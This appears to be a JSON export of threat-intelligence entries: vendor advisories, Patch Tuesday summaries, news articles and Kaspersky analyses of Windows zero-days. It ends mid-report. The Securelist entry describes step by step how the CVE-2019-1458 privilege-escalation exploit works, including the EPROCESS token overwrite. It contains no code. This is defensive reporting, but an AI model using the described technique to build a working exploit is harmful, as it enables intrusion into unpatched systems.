Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-11-12T00:00:00", "published": "2019-11-12T00:00:00", "id": "SMNTC-110790", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110790", "type": "symantec", "title": "Microsoft Windows Remote Procedure Call CVE-2019-1409 Local Information Disclosure Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2021-01-15T00:26:33", "bulletinFamily": "blog", "cvelist": ["CVE-2020-17087", "CVE-2021-1647", "CVE-2021-1648"], "description": "This month\u2019s Microsoft Patch Tuesday addresses 83 vulnerabilities. The 10 Critical vulnerabilities cover Windows codecs, Office, HEVC video extensions, RPC runtime, and several other workstation vulnerabilities. Adobe released patches today for Photoshop, Campaign Classic, InCopy, Illustrator, Captivate, Bridge and Animate.\n\n### Workstation Patches\n\nOffice and Edge vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used to access email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Defender RCE Zero Day\n\nMicrosoft patches Defender Remote Code Execution vulnerability ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in today&#x27;s patch release for Microsoft Malware Protection Engine. Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.\n\n### splwow64 Elevation of Privilege\n\nWhile Microsoft labeled this issue ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) as an elevation-of-privilege vulnerability, it can also be exploited to disclose information, specifically uninitialized memory. Microsoft stated the vulnerability has not been exploited in the wild, although details are available publicly.\n\n### Windows Kernel Local Elevation of Privilege\n\nMicrosoft updated [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) for Windows Server 2012 in today&#x27;s Patch Tuesday, and users are recommended to apply today&#x27;s patches for Windows Server 2012.\n\nWe appreciate Microsoft&#x27;s acknowledgement of our co-ordinated disclosure of the underlying regression in the Windows Server 2012 version of this security update.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb21-01.html>), [Illustrator](<https://helpx.adobe.com/security/products/photoshop/apsb21-02.html>), [Animate](<https://helpx.adobe.com/security/products/photoshop/apsb21-03.html>), [Campaign](<https://helpx.adobe.com/security/products/photoshop/apsb21-04.html>), [InCopy,](<https://helpx.adobe.com/security/products/photoshop/apsb21-05.html>) [Captivate](<https://helpx.adobe.com/security/products/photoshop/apsb21-06.html>) and [Bridge](<https://helpx.adobe.com/security/products/photoshop/apsb21-07.html>). The patches for Adobe Campaign are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "modified": "2021-01-12T20:01:43", "published": "2021-01-12T20:01:43", "id": "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "January 2021 Patch Tuesday \u2013 83 Vulnerabilities, 10 Critical, One Zero Day, Adobe", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T23:21:47", "bulletinFamily": "blog", "cvelist": ["CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1471"], "description": "This month's Patch Tuesday is rather light and addresses 36 vulnerabilities, with only 7 labeled as Critical. Five of the seven Critical vulns are in Git for Visual Studio. The others are for Hyper-V and Win32k. Also, there is one actively attacked \"Important\" vuln in Win32k. Adobe released patches today covering Acrobat/Reader, ColdFusion, Photoshop, and Brackets.\n\n### Workstation Patches\n\nWin32k patches ([CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>) and [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)) should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\nThough listed as Important, Microsoft has disclosed that CVE-2019-1458 is actively attacked in the wild.\n\n### Hyper-V Hypervisor Escapes\n\nA remote code execution vulnerability ([CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>)) is patched in Hyper-V that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all Hyper-V systems.\n\n### Git for Visual Studio\n\nMicrosoft patched 5 vulnerabilities ([CVE-2019-1354](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1354>), [CVE-2019-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1350>), [CVE-2019-1352](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1352>), [CVE-2019-1387](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1387>), and [CVE-2019-1349](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1349>)) in Git for Visual Studio. Exploitation requires that a user clones a malicious repo. Based on the details provided, the vulnerabilities appear to all be Command Injection. These patches should be prioritized for any Visual Studio installations that use Git.\n\n### Adobe\n\nAdobe's Patch Tuesday covers Acrobat/Reader, ColdFusion, Photoshop, and Brackets. The patches for [Acrobat/Reader](<https://helpx.adobe.com/security/products/acrobat/apsb19-55.html>) (21 vulns) and [ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb19-58.html>) (1 vuln) are listed as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the patches for [Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb19-56.html>) (2 vulns) and [Brackets](<https://helpx.adobe.com/security/products/brackets/apsb19-57.html>) (1 vuln) are labeled [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>). The Acrobat/Reader patches should be prioritized for Workstations with this software installed, and the ColdFusion patches should be prioritized on ColdFusion servers.", "modified": "2019-12-10T19:04:23", "published": "2019-12-10T19:04:23", "id": "QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/12/10/december-2019-patch-tuesday-36-vulns-7-critical-actively-attacked-win32k-vuln-adobe-vulns", "type": "qualysblog", "title": "December 2019 Patch Tuesday \u2013 36 Vulns, 7 Critical, Actively Attacked Win32k vuln, Adobe vulns", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2021-01-13T06:30:13", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1674", "CVE-2021-1705"], "description": "[](<https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nFor the first patch Tuesday of 2021, Microsoft released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>) addressing a total of 83 flaws spanning as many as 11 products and services, including an actively exploited zero-day vulnerability.\n\nThe latest security patches cover Microsoft Windows, Edge browser, ChakraCore, Office and Microsoft Office Services, and Web Apps, Visual Studio, Microsoft Malware Protection Engine, .NET Core, ASP .NET, and Azure. Of these 83 bugs, 10 are listed as Critical, and 73 are listed as Important in severity.\n\nThe most severe of the issues is a remote code execution (RCE) flaw in Microsoft Defender ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) that could allow attackers to infect targeted systems with arbitrary code.\n\nMicrosoft Malware Protection Engine (mpengine.dll) provides the scanning, detection, and cleaning capabilities for Microsoft Defender antivirus and antispyware software. The last version of the software affected by the flaw is 1.1.17600.5, before it was addressed in version 1.1.17700.4.\n\nThe bug is also known to have been actively exploited in the wild, although details are scarce on how widespread the attacks are or how this is being exploited. It's also a zero-click flaw in that the vulnerable system can be exploited without any interaction from the user.\n\nMicrosoft said that despite active exploitation, the technique is not functional in all situations and that the exploit is still considered to be at a proof-of-concept level, with substantial modifications required for it to work effectively.\n\nWhat's more, the flaw may already be resolved as part of automatic updates to the Malware Protection Engine \u2014 which it typically releases once a month or as when required to safeguard against newly discovered threats \u2014 unless the systems are not connected to the Internet.\n\n\"For organizations that are configured for automatic updating, no actions should be required, but one of the first actions a threat actor or malware will try to attempt is to disrupt threat protection on a system so definition and engine updates are blocked,\" said Chris Goettl, senior director of product management and security at Ivanti.\n\nTuesday's patch also rectifies a privilege escalation flaw ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) introduced by a previous patch in the GDI Print / Print Spooler API (\"splwow64.exe\") that was [disclosed by Google Project Zero](<https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html>) last month after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOther vulnerabilities fixed by Microsoft include a memory corruption flaws in Microsoft Edge browser ([CVE-2021-1705](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1705>)), a Windows Remote Desktop Protocol Core Security feature bypass flaw ([CVE-2021-1674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1674>), CVSS score 8.8), and five critical RCE flaws in Remote Procedure Call Runtime.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-13T05:01:20", "published": "2021-01-13T05:01:00", "id": "THN:9CF96D7230D0DBA395C1DEDA718226AD", "href": "https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html", "type": "thn", "title": "Microsoft Issues Patches for Defender Zero-Day and 82 Other Windows Flaws", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-29T10:26:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "[](<https://thehackernews.com/images/-iuZmw75wd8g/YA-j-PbeyrI/AAAAAAAABlE/RgTbZC607W00K50gmsHyQ2wxzElQjkCMwCLcBGAsYHQ/s0/north-korean-hackers.jpg>)\n\nGoogle on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.\n\nThe internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.\n\nThe goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\n\"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers,\" [said](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) TAG researcher Adam Weidemann.\n\nThe attackers created as many as 10 fake Twitter personas and five LinkedIn profiles, which they used to engage with the researchers, share videos of exploits, retweet other attacker-controlled accounts, and share links to their purported research blog.\n\nIn one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw ([CVE-2021-1647](<https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html>)), when in reality, the exploit turned out to be fake.\n\n[](<https://thehackernews.com/images/-z357EvP7xhQ/YA-h_c5mACI/AAAAAAAABk4/Rfunq4GEsRYSpfML7a1rW1uzau-Y92QCQCLcBGAsYHQ/s0/twitter.jpg>)\n\nThe North Korean hackers are also said to have used a \"novel social engineering method\" to hit security researchers by asking them if they would like to collaborate on vulnerability research together and then provide the targeted individual with a Visual Studio Project.\n\nThis Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.\n\nKaspersky researcher Costin Raiu, in a [tweet](<https://twitter.com/craiu/status/1353964086455902208>), noted the malware delivered via the project shared code-level similarities with [Manuscrypt](<https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer>) (aka FAILCHILL or Volgmer), a previously known Windows backdoor deployed by the Lazarus Group.\n\nWhat's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 server.\n\n[](<https://thehackernews.com/images/-5WNEGS3rJFg/YA-ht9CNs1I/AAAAAAAABkw/Q6gouDrb7eg3yZSUK7zlsoHZh-S_1heVACLcBGAsYHQ/s0/security-reseachers.jpg>)\n\nWith the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.\n\n\"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,\" Weidemann said.\n\n### UPDATE (28 Jan, 2021): Microsoft releases more information on this campaign\n\nIn a separate analysis, Microsoft corroborated the findings, attributing the attacks to a threat actor it calls ZINC, also known as Lazarus Group or Hidden Cobra.\n\nThe Windows maker said the campaign took roots in mid-2020 when the adversary \"started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog.\"\n\nMicrosoft's analysis of the malicious DLL (dubbed \"Comebacker\") has also revealed the group's attempts to evade detection via static indicators of compromise (IoCs) by frequently changing file names, file paths, and exported functions. \"We were first alerted to the attack when Microsoft Defender for Endpoint detected the Comebacker DLL attempting to perform process privilege escalation,\" the company [said](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>).\n\nThat's not all. With some researchers infected simply by visiting the website on fully patched systems running Windows 10 and Chrome browser, the company suspects a Chrome exploit chain leveraging zero-day or patch gap exploits was hosted on the blog, leading to the compromise.\n\n\"A blog post titled _DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug_, was shared by the actor on October 14, 2020 from Twitter,\" the researchers said. \"From October 19-21, 2020, some researchers, who hadn't been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-29T09:15:54", "published": "2021-01-26T05:10:00", "id": "THN:970890B8E519A3BC5427798160F5F09C", "href": "https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html", "type": "thn", "title": "N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:23:44", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1462", "CVE-2019-1471"], "description": "[](<https://1.bp.blogspot.com/-RxpnqOyfKYk/XfCKSQ-twvI/AAAAAAAA188/wyq915hkjRc_JOvPZEXvsMltV7RjINNAACLcBGAsYHQ/s728-e100/microsoft-windows-update.jpg>)\n\nWith its latest and last Patch Tuesday for 2019, Microsoft is warning billions of its users of a new Windows zero-day vulnerability that attackers are actively exploiting in the wild in combination with a [Chrome exploit](<https://thehackernews.com/2019/11/chrome-zero-day-update.html>) to take remote control over vulnerable computers. \n \nMicrosoft's December security updates include patches for a total of 36 vulnerabilities, where 7 are critical, 27 important, 1 moderate, and one is low in severity\u2014brief information on which you can find later in this article. \n \nTracked as **CVE-2019-1458** and rated as Important, the newly patched zero-day Win32k privilege escalation vulnerability, reported by Kaspersky, was used in **Operation WizardOpium** attacks to gain higher privileges on targeted systems by escaping the Chrome sandbox. \n \nAlthough Google addressed the flaw in Chrome 78.0.3904.87 with the release of an emergency update last month after Kaspersky disclosed it to the tech giant, hackers are still targeting users who are using vulnerable versions of the browser. \n\n\n \nAs The Hacker News [reported last month](<https://thehackernews.com/2019/11/chrome-zero-day-update.html>), Operation WizardOpium involved a compromised Korean-language news portal where attackers secretly planted a then-zero-day Chrome exploit to hack computers of its visitors. \n \nAccording to [Kaspersky](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) researchers, the Chrome use-after-free exploit was chained together with the newly patched EoP flaw that exists in the way the Win32k component in Windows OS handles objects in memory. \n \n\n\n[](<https://1.bp.blogspot.com/-0b8M8M8fp_w/Xbxsu-MXsoI/AAAAAAAA1lM/Oe9kuPoxP6ozEr3xPwug8zkpFN0ngBIWACLcBGAsYHQ/s728-e100/hacking.png>)\n\n \nThe EoP exploit works on \"the latest versions of Windows 7 and even on a few builds of Windows 10\" and, if successfully exploited, could allow an attacker to run arbitrary code in kernel mode. \n \nWhile the researchers were not able to attribute the Operation WizardOpium attacks to any specific group of hackers, they found some similarities in the exploit code with the infamous [Lazarus hacking group](<https://thehackernews.com/2019/09/north-korea-cyber-attack.html>). \n \n\n\n## Microsoft Patch Tuesday: December 2019\n\n \nThe 7 critical security vulnerabilities [Microsoft patched this month](<https://msrc-blog.microsoft.com/2019/12/10/december-2019-security-updates-are-available/>) affect Git for Visual Studio, Hyper-V Hypervisor, and Win32k Graphics component of Windows, successful exploitation of all lead to remote code execution attacks. \n \nThe Windows Hyper-V vulnerability (**CVE-2019-1471**) enables a guest virtual machine to compromise the hypervisor, escaping from a guest virtual machine to the host, or escaping from one guest virtual machine to another guest virtual machine. \n \nGit for Visual Studio contains five critical remote code execution vulnerabilities\u2014all reside due to the way Git for Visual Studio sanitizes input\u2014successful exploitation of which requires attackers to convince a targeted user to clone a malicious repo. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nAnother notable vulnerability, tracked as **CVE-2019-1462** and rated as important, resides in the PowerPoint software that can be exploited to run arbitrary code on a targeted computer by merely convincing the victim into opening a specially crafted presentation file. \n \nThis vulnerability affects Microsoft PowerPoint 2010, 2013, and 2016 as well as Microsoft Office 2016 and 2019 for Windows and Apple's macOS operating systems. \n \nOther vulnerabilities patched by Microsoft this month and marked as important reside in the following Microsoft products and services: \n \n\n\n * Windows Operating System\n * Windows Kernel\n * Windows Remote Desktop Protocol (RDP)\n * Microsoft Word\n * Microsoft Excel\n * Microsoft SQL Server Reporting Services\n * Microsoft Access software\n * Windows GDI component\n * Win32k\n * Windows Hyper-V\n * Windows Printer Service\n * Windows COM Server\n * Windows Media Player\n * Windows OLE\n * VBScript\n * Visual Studio Live Share\n * Microsoft Authentication Library for Android\n * Microsoft Defender\n * Skype for Business and Lync\n * Git for Visual Studio\n \nMost of these vulnerabilities allow information disclosure and elevation of privilege, and some also lead to remote code execution attacks, while others allow cross-site scripting (XSS), security feature bypass, spoofing, tampering, and denial of service attacks. \n \nWindows users and system administrators are highly advised to apply the latest security patches as soon as possible in an attempt to keep cybercriminals and hackers away from taking control of their computers. \n \nFor installing the latest Windows security updates, you can head on to Settings \u2192 Update &amp; Security \u2192 Windows Update \u2192 Check for updates on your PC, or you can install the updates manually. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-12-11T06:19:18", "published": "2019-12-11T06:19:00", "id": "THN:592EF1422E531E5A7AD2804EA7E024CD", "href": "https://thehackernews.com/2019/12/windows-zero-day-patch.html", "type": "thn", "title": "Latest Microsoft Update Patches New Windows 0-Day Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2019-12-12T11:22:50", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader \u2013 parsing PE headers, handling imports/exports, etc. After that, a code execution is redirected to the entry point of the DLL \u2013 the DllEntryPoint function. The PE code then creates a new thread, which is an entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was the 0-day exploit because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to windows switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call that's used to find a dozen offsets needed to set up fake kernel GDI objects in the memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. Then a bunch of calls to CreateBitmap are performed, the addresses to which are leaked using a handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and an undocumented syscall NtUserMessageCall is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771) and it's important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then using a call to SetBitmapBits it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value for an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. In this particular attack sandbox solution can analyze URL/malicious payload in isolated environment and detect the EPROCESS token manipulation.", "modified": "2019-12-10T20:00:39", "published": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group&#x27;s interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker&#x27;s LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker&#x27;s activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn&#x27;t limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework&#x27;s components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and 